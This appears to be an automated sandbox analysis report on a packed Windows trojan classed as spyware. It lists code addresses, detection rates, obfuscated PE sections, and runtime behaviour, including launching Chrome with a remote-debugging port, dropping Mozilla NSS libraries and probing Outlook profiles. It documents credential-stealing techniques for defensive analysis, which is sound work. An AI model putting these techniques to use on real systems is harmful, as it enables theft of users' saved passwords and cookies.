Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C53AC60 0_2_6C53AC60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60AC30 0_2_6C60AC30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F6C00 0_2_6C5F6C00
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58ECD0 0_2_6C58ECD0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C52ECC0 0_2_6C52ECC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5FED70 0_2_6C5FED70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C65AD50 0_2_6C65AD50
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B8D20 0_2_6C6B8D20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6BCDC0 0_2_6C6BCDC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C6D90 0_2_6C5C6D90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C534DB0 0_2_6C534DB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CEE70 0_2_6C5CEE70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C610E20 0_2_6C610E20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C53AEC0 0_2_6C53AEC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5D0EC0 0_2_6C5D0EC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B6E90 0_2_6C5B6E90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59EF40 0_2_6C59EF40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F2F70 0_2_6C5F2F70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C536F10 0_2_6C536F10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670F20 0_2_6C670F20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60EFF0 0_2_6C60EFF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C530FE0 0_2_6C530FE0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C678FB0 0_2_6C678FB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C53EFB0 0_2_6C53EFB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C604840 0_2_6C604840
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C580820 0_2_6C580820
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5BA820 0_2_6C5BA820
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6368E0 0_2_6C6368E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C568960 0_2_6C568960
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C586900 0_2_6C586900
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C64C9E0 0_2_6C64C9E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5649F0 0_2_6C5649F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F09B0 0_2_6C5F09B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C09A0 0_2_6C5C09A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5EA9A0 0_2_6C5EA9A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5ACA70 0_2_6C5ACA70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5DEA00 0_2_6C5DEA00
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E8A30 0_2_6C5E8A30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5AEA80 0_2_6C5AEA80
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C636BE0 0_2_6C636BE0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5D0BA0 0_2_6C5D0BA0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C548460 0_2_6C548460
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5BA430 0_2_6C5BA430
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C594420 0_2_6C594420
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5764D0 0_2_6C5764D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CA4D0 0_2_6C5CA4D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C65A480 0_2_6C65A480
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C588540 0_2_6C588540
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C634540 0_2_6C634540
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5D0570 0_2_6C5D0570
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C678550 0_2_6C678550
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C592560 0_2_6C592560
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5BE5F0 0_2_6C5BE5F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5FA5E0 0_2_6C5FA5E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5245B0 0_2_6C5245B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58C650 0_2_6C58C650
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5546D0 0_2_6C5546D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58E6E0 0_2_6C58E6E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CE6E0 0_2_6C5CE6E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B0700 0_2_6C5B0700
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C55A7D0 0_2_6C55A7D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C57E070 0_2_6C57E070
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F8010 0_2_6C5F8010
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5FC000 0_2_6C5FC000
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C528090 0_2_6C528090
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60C0B0 0_2_6C60C0B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5400B0 0_2_6C5400B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C598140 0_2_6C598140
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C614130 0_2_6C614130
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5A6130 0_2_6C5A6130
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5301E0 0_2_6C5301E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C8250 0_2_6C5C8250
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B8260 0_2_6C5B8260
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C608220 0_2_6C608220
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5FA210 0_2_6C5FA210
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B62C0 0_2_6C6B62C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6022A0 0_2_6C6022A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5FE2B0 0_2_6C5FE2B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C64C360 0_2_6C64C360
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C538340 0_2_6C538340
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C672370 0_2_6C672370
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C532370 0_2_6C532370
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C6370 0_2_6C5C6370
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5A2320 0_2_6C5A2320
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5843E0 0_2_6C5843E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58E3B0 0_2_6C58E3B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5623A0 0_2_6C5623A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C533C40 0_2_6C533C40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C659C40 0_2_6C659C40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C541C30 0_2_6C541C30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66DCD0 0_2_6C66DCD0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F1CE0 0_2_6C5F1CE0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CFC80 0_2_6C5CFC80
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C593D00 0_2_6C593D00
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C601DC0 0_2_6C601DC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C523D80 0_2_6C523D80
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C679D90 0_2_6C679D90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B5E60 0_2_6C6B5E60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C68BE70 0_2_6C68BE70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C63DE10 0_2_6C63DE10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C553EC0 0_2_6C553EC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C687F20 0_2_6C687F20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C525F30 0_2_6C525F30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C565F20 0_2_6C565F20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C64DFC0 0_2_6C64DFC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B3FC0 0_2_6C6B3FC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5DBFF0 0_2_6C5DBFF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C551F90 0_2_6C551F90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58D810 0_2_6C58D810
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60F8F0 0_2_6C60F8F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C68B8F0 0_2_6C68B8F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CF8C0 0_2_6C5CF8C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C53D8E0 0_2_6C53D8E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5638E0 0_2_6C5638E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5AF960 0_2_6C5AF960
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5ED960 0_2_6C5ED960
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C67F900 0_2_6C67F900
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E5920 0_2_6C5E5920
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5699D0 0_2_6C5699D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C99C0 0_2_6C5C99C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5959F0 0_2_6C5959F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C79F0 0_2_6C5C79F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C541980 0_2_6C541980
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C601990 0_2_6C601990
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B9A50 0_2_6C6B9A50
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C56FA10 0_2_6C56FA10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5D1A10 0_2_6C5D1A10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C62DA30 0_2_6C62DA30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C531AE0 0_2_6C531AE0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60DAB0 0_2_6C60DAB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60FB60 0_2_6C60FB60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C57BB20 0_2_6C57BB20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C577BF0 0_2_6C577BF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C521B80 0_2_6C521B80
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F9BB0 0_2_6C5F9BB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C615B90 0_2_6C615B90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C589BA0 0_2_6C589BA0
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C559B10 appears 97 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C6B09D0 appears 147 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C553620 appears 93 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C669F30 appears 50 times
Source: random(1).exe, 00000000.00000002.2028991333.000000006F902000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs random(1).exe
Source: random(1).exe, 00000000.00000002.2028835685.000000006C705000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs random(1).exe
Source: random(1).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random(1).exe Static PE information: Section: fsoqnkix ZLIB complexity 0.995146165615727
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/36@6/7
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 0_2_6C590300
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OI5WW9ZK.htm
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: random(1).exe, random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: random(1).exe, 00000000.00000003.1902604599.0000000005565000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: random(1).exe ReversingLabs: Detection: 78%
Source: random(1).exe Virustotal: Detection: 77%
Source: random(1).exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\random(1).exe "C:\Users\user\Desktop\random(1).exe"
Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8
Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\random(1).exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\random(1).exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\random(1).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: random(1).exe Static file information: File size 1833472 > 1048576
Source: random(1).exe Static PE information: Raw size of fsoqnkix is bigger than: 0x100000 < 0x1a5400
Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\random(1).exe Unpacked PE file: 0.2.random(1).exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random(1).exe Static PE information: real checksum: 0x1cabc1 should be: 0x1c8de0
Source: random(1).exe Static PE information: section name:
Source: random(1).exe Static PE information: section name: .idata
Source: random(1).exe Static PE information: section name:
Source: random(1).exe Static PE information: section name: fsoqnkix
Source: random(1).exe Static PE information: section name: axozysaw
Source: random(1).exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random(1).exe Static PE information: section name: fsoqnkix entropy: 7.955262014812053
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\freebl3.dll
